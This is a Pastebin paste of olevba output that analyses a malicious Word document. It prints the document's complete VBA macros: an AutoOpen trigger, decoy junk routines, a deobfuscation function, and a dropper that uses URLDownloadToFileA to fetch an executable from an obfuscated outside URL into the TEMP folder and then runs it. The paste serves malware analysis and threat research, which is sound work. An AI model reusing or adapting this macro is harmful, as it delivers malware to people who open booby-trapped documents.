Advertisement
dynamoo

Malicious Word macro

Mar 13th, 2015
612
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- r-1179776-2.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: r-1179776-2.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. atqk_x482mp6v
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Class1.cls
  27. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/Class1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. Public Sub JHyKASbxIHuhtS84()
  30. Dim geRVTgYKeFHEkG74 As Integer
  31. For geRVTgYKeFHEkG74 = 6 To Jl
  32. DoEvents
  33. Next geRVTgYKeFHEkG74
  34. Dim vLMDtrhALGmHPA31 As String
  35. vLMDtrhALGmHPA31 = "CtlLoYxCdDrrCR11"
  36. End Sub
  37.  
  38. Public Sub xlvLhuAzNZGLWN89()
  39. Dim WTCBlIIcmnviie69 As Integer
  40. For WTCBlIIcmnviie69 = 3 To yB
  41. DoEvents
  42. Next WTCBlIIcmnviie69
  43. Dim txdGLvkuqZelnG26 As String
  44. txdGLvkuqZelnG26 = "EIQWCNvZTnSUDK16"
  45. End Sub
  46.  
  47. Public Sub ofWOXlANArfREH64()
  48. Dim lrqvxpqOjtKHXZ44 As Integer
  49. For lrqvxpqOjtKHXZ44 = 9 To sb
  50. DoEvents
  51. Next lrqvxpqOjtKHXZ44
  52. Dim JhORnQktQeAtoT34 As String
  53. JhORnQktQeAtoT34 = "auVlNAaFAtyjZk14"
  54. End Sub
  55.  
  56. Public Sub iTpzwmkdrKMuCX21()
  57. Dim TJIibCvUvHEwoB11 As Integer
  58. For TJIibCvUvHEwoB11 = 9 To LW
  59. DoEvents
  60. Next TJIibCvUvHEwoB11
  61. Dim HIVVBSikgJiUZQ81 As String
  62. HIVVBSikgJiUZQ81 = "fMxregfSOGJXGF72"
  63. End Sub
  64.  
  65. Public Sub pIJXclhCxOCUIg61()
  66. Dim UMhzAWxkJUYXMk41 As Integer
  67. For UMhzAWxkJUYXMk41 = 9 To EN
  68. DoEvents
  69. Next UMhzAWxkJUYXMk41
  70. Dim KQTKzQyaUIqifr31 As String
  71. KQTKzQyaUIqifr31 = "hCrVyddxzYMxnu12"
  72. End Sub
  73.  
  74. Public Sub vpkmlyrWJDiBrW25()
  75. Dim XwHnxUqjsQJfjV15 As Integer
  76. For XwHnxUqjsQJfjV15 = 3 To nR
  77. DoEvents
  78. Next XwHnxUqjsQJfjV15
  79. Dim usyhXcMNzSwbPP86 As String
  80. usyhXcMNzSwbPP86 = "RvRwNBawxPtDCD76"
  81. End Sub
  82.  
  83. Public Sub uxtXPcgVNZdndx27()
  84. Dim kflSpdVIGEJSTo17 As Integer
  85. For kflSpdVIGEJSTo17 = 9 To Ev
  86. DoEvents
  87. Next kflSpdVIGEJSTo17
  88. Dim GbKKfGrepAnaKs88 As String
  89. GbKKfGrepAnaKs88 = "NhiUFRDSNEtdqV78"
  90. End Sub
  91.  
  92. Public Sub XNMdWIxljyiqdn33()
  93. Dim ldllVpEGQrJvvE23 As Integer
  94. For ldllVpEGQrJvvE23 = 7 To fn
  95. DoEvents
  96. Next ldllVpEGQrJvvE23
  97. Dim EeIivNdvntwPKh93 As String
  98. EeIivNdvntwPKh93 = "zgufZAlMWetBtl83"
  99. End Sub
  100.  
  101. Public Sub CeAuCYmrOCqQVL73()
  102. Dim wgNdaiAbrWMBpX53 As Integer
  103. For wgNdaiAbrWMBpX53 = 7 To VT
  104. DoEvents
  105. Next wgNdaiAbrWMBpX53
  106. Dim TyhzAVqoLXvsEI43 As String
  107. TyhzAVqoLXvsEI43 = "rkFiRnkRfMibHQ23"
  108. End Sub
  109.  
  110. Public Sub dRzRKlperameln47()
  111. Dim PHnPXMhvvBrjYE27 As Integer
  112. For PHnPXMhvvBrjYE27 = 1 To UF
  113. DoEvents
  114. Next PHnPXMhvvBrjYE27
  115. Dim MUHnwPBigNIZNg97 As String
  116. MUHnwPBigNIZNg97 = "lLgYbsyEIVkJdl88"
  117. End Sub
  118.  
  119.  
  120. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  121. ANALYSIS:
  122. +------------+----------------+-----------------------------------------+
  123. | Type       | Keyword        | Description                             |
  124. +------------+----------------+-----------------------------------------+
  125. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  126. |            |                | may be used to obfuscate strings        |
  127. |            |                | (option --decode to see all)            |
  128. +------------+----------------+-----------------------------------------+
  129. -------------------------------------------------------------------------------
  130. VBA MACRO àûâàûâàÀàâï.bas
  131. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/\u0430\u044b\u0432\u0430\u044b\u0432\u0430\u0410\u0430\u0432\u043f'
  132. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  133. #If VBA7 Then
  134.     Private Declare PtrSafe Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
  135.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  136.     ByVal ÐÎÀðàâûðàÃÎâï As String, _
  137.     ByVal ÐÎÀðàâûðàÃÎâïf As String, _
  138.     ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
  139.     ByVal ÐÎÀðàâûðàÃÎâïfds As LongPtr) As LongPtr
  140. #Else
  141.     Private Declare Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
  142.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  143.     ByVal ÐÎÀðàâûðàÃÎâï As String, _
  144.     ByVal ÐÎÀðàâûðàÃÎâïf As String, _
  145.     ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
  146.     ByVal ÐÎÀðàâûðàÃÎâïfds As Long) As Long
  147. #End If
  148. Sub atqk_x482mp6v()
  149. âàûâÀÀûâïûâà QSzFZhQCxywB("h<tQtFpi:I/t/Uajwubnr„sA.]cloom.Ja@uy/}jWsc/$b4i„n\.SeTxQe["), Environ(QSzFZhQCxywB("TsMQPQ")) & QSzFZhQCxywB("\8f9JmC}h1jhf)geD06R7i5SeNDBTeU_.'elx€e(")
  150. End Sub
  151. Function âàûâÀÀûâïûâà(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
  152. ÏÐûâàÀ = ÎðâààÌÐÎëâïâàï(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
  153. Set ãíÃØÀÏøâûà = CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) & Chr$(108) & Chr$(89) & Chr$(108) & Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) & Chr$(52) & Chr$(112) & Chr$(97) & Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) & Chr$(105) & Chr$(47) & Chr$(99) & Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) & Chr$(59) & Chr$(105) & Chr$(75) & Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))
  154. ãíÃØÀÏøâûà.Open Environ(QSzFZhQCxywB(Chr$(84) & Chr$(106) & Chr$(77) & Chr$(107) & Chr$(80) & Chr$(104))) & QSzFZhQCxywB(Chr$(92) & Chr$(114) & Chr$(102) & Chr$(85) & Chr$(74) & Chr$(71) & Chr$(67) & Chr$(85) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(95) & Chr$(102) & Chr$(67) & Chr$(103) & Chr$(98) & Chr$(68) & Chr$(105) & Chr$(54) & Chr$(110) & Chr$(55) & Chr$(94) & Chr$(53) & Chr$(42) & Chr$(101) & Chr$(98) & Chr$(68) & Chr$(57) & Chr$(84) & Chr$(127) & Chr$(85) & Chr$(118) & Chr$(46) & Chr$(96) & Chr$(101) & Chr$(36) & Chr$(120) & Chr$(117) & Chr$(101) & Chr$(100))
  155. End Function
  156.  
  157.  
  158.  
  159. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  160. ANALYSIS:
  161. +------------+--------------------+-----------------------------------------+
  162. | Type       | Keyword            | Description                             |
  163. +------------+--------------------+-----------------------------------------+
  164. | Suspicious | CreateObject       | May create an OLE object                |
  165. | Suspicious | Lib                | May run code from a DLL                 |
  166. | Suspicious | Open               | May open a file                         |
  167. | Suspicious | Environ            | May read system environment variables   |
  168. | Suspicious | Chr                | May attempt to obfuscate specific       |
  169. |            |                    | strings                                 |
  170. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  171. +------------+--------------------+-----------------------------------------+
  172. -------------------------------------------------------------------------------
  173. VBA MACRO àïàâïÏÏàâï.bas
  174. in file: r-1179776-2.doc - OLE stream: u'Macros/VBA/\u0430\u043f\u0430\u0432\u043f\u041f\u041f\u0430\u0432\u043f'
  175. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  176.  
  177. Public Function QSzFZhQCxywB(CwOLiEdjfquIe As String) As String
  178. For pytQnFatnd = 1 To Len(CwOLiEdjfquIe) Step 2
  179. QSzFZhQCxywB = QSzFZhQCxywB & Mid(CwOLiEdjfquIe, pytQnFatnd, 1)
  180. Next
  181. End Function
  182.  
  183. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  184. ANALYSIS:
  185. No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement